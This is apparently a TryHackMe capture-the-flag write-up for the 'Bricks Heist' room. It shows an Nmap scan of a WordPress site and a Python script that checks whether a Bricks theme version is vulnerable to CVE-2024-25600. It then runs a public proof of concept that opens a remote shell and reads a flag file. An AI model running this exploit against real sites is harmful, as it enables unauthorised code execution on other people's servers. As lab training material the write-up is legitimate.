# TryHack3M Bricks Heist

Add the room's hostname to `/etc/hosts`, replacing `$IP` with the IP address of your machine instance:

```bash
sudo nano /etc/hosts

# Append a line in this format (tab or spaces between the fields)
$IP		bricks.thm
```

### Reconnaissance

Run an Nmap scan to enumerate open ports and services:

```text
nmap -sV -sC -A -p 22,80,443,3306 10.10.249.30

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-15 17:51 BST
Nmap scan report for bricks.thm (10.10.249.30)
Host is up (0.00047s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Mon, 15 Apr 2024 16:51:17 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Mon, 15 Apr 2024 16:51:17 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp  open  ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Brick by Brick
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
	<REMOVED TO SAVE LENGTH>
MAC Address: 02:B2:AF:27:CD:65 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms bricks.thm (10.10.249.30)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.93 seconds

```

The scan output reveals:

* Port 22: OpenSSH 8.2p1 on Ubuntu; nothing to do here until we have credentials
* Port 80: a Python WebSockify server (a WebSocket-to-TCP proxy, usually fronting noVNC) that answers plain HTTP with 405/501; not part of this attack path
* Port 443: Apache serving WordPress 6.5 (site title "Brick by Brick") behind a self-signed certificate with the default OpenSSL subject (`Internet Widgits Pty Ltd`), plus a `robots.txt` that disallows `/wp-admin/`; this is the target
* Port 3306: MySQL, reported as "unauthorized" because the server refuses connections from our host; not part of this attack path

Note that Nmap only reports the WordPress core version, not the theme. The room name and site title point at the Bricks Builder theme, which is what the exploit below targets.

### Exploitation

A quick Google search for "wordpress bricks exploit" turns up a public proof of concept for CVE-2024-25600, an unauthenticated remote code execution bug in the Bricks Builder WordPress theme: <https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT/blob/main/CVE-2024-25600.py>.
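Before pointing a PoC at a host it is worth confirming the theme and its version, since Nmap only reported the WordPress core version. The script below is an added example for this writeup, not the K3ysTr0K3R exploit or anything from the room: it parses the theme header that WordPress serves at `wp-content/themes/<slug>/style.css` and compares the `Version:` field against 1.9.6.1, the first Bricks release that fixes CVE-2024-25600 (1.9.6 and earlier are affected). The sample header is constructed; the `fetch_theme_header` helper, the `bricks` slug and the disabled TLS verification are assumptions about the lab.

```python
"""Check whether a WordPress site runs a Bricks theme version affected by CVE-2024-25600.

Added example for this writeup (not the exploit script or room material).
Themes publish their metadata in the comment block at the top of style.css.
"""
import re
import ssl
import sys
import urllib.request

# Constructed sample of a theme header as served from style.css (not captured from the lab).
SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Author: Bricks
Version: 1.9.5
Text Domain: bricks
*/
"""

# First Bricks release carrying the fix for CVE-2024-25600; anything below is affected.
FIXED_VERSION = (1, 9, 6, 1)


def parse_theme_header(css: str) -> dict:
    """Return the 'Key: value' pairs from the leading comment block, keys lower-cased."""
    m = re.search(r"/\*(.*?)\*/", css, re.S)
    if not m:
        return {}
    header = {}
    for line in m.group(1).splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        header[key.strip().lower()] = value.strip()
    return header


def version_tuple(version: str) -> tuple:
    """'1.9.6' -> (1, 9, 6). Non-numeric suffixes ('6-beta') are dropped so the compare still works."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        if not digits:
            break
        parts.append(int(digits.group()))
    return tuple(parts)


def bricks_vulnerable(header: dict) -> bool:
    """True only when the header belongs to Bricks and its version predates the fix."""
    if header.get("theme name", "").lower() != "bricks":
        return False
    version = header.get("version")
    if not version:
        return False
    # Tuple comparison: (1, 9, 6) < (1, 9, 6, 1) holds, so 1.9.6 itself is flagged.
    return version_tuple(version) < FIXED_VERSION


def fetch_theme_header(base_url: str, slug: str = "bricks", verify_tls: bool = False) -> dict:
    """Fetch and parse wp-content/themes/<slug>/style.css from a live site (assumed slug).

    TLS verification is off by default because the lab serves a self-signed certificate.
    """
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    url = f"{base_url.rstrip('/')}/wp-content/themes/{slug}/style.css"
    with urllib.request.urlopen(url, context=ctx, timeout=10) as resp:
        return parse_theme_header(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # With a URL argument the live header is fetched; without one the constructed sample is used.
    hdr = fetch_theme_header(sys.argv[1]) if len(sys.argv) == 2 else parse_theme_header(SAMPLE_STYLE_CSS)
    state = "affected by CVE-2024-25600" if bricks_vulnerable(hdr) else "not affected"
    print(f"{hdr.get('theme name')} {hdr.get('version')}: {state}")
```

Run it with no arguments to exercise the constructed sample, or with `https://bricks.thm` to read the live header before launching the PoC. A missing `Theme Name` or `Version` field is treated as "not affected" rather than guessed, so a 404 on the assumed path shows up as an exception, not a false positive.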

Run the PoC against the target. WordPress is only served on 443, so the URL must use `https://`; the address below differs from the one in the scan, so use whatever IP your own instance has:

```text
root@ip-10-10-23-59:~# python3 CVE-2024-25600.py -u https://10.10.213.55

   _______    ________    ___   ____ ___  __ __       ___   ___________ ____  ____
  / ____/ |  / / ____/   |__ \ / __ \__ \/ // /      |__ \ / ____/ ___// __ \/ __ \
 / /    | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/  |___/_____/    /____/\____/____/ /_/       /____/_____/\____/\____/\____/

Coded By: K3ysTr0K3R --> Hello, Friend!

[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://10.10.213.55
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{DIY}


```

The shell lands in the web root, where the flag sits in `650c844110baced87e1606453b93f22a.txt`; reading it with `cat` gives the answer.

TL;DR: add `bricks.thm` to `/etc/hosts`, run the CVE-2024-25600 PoC for the Bricks Builder theme against the HTTPS site to get a shell, and read the flag file in the web root.

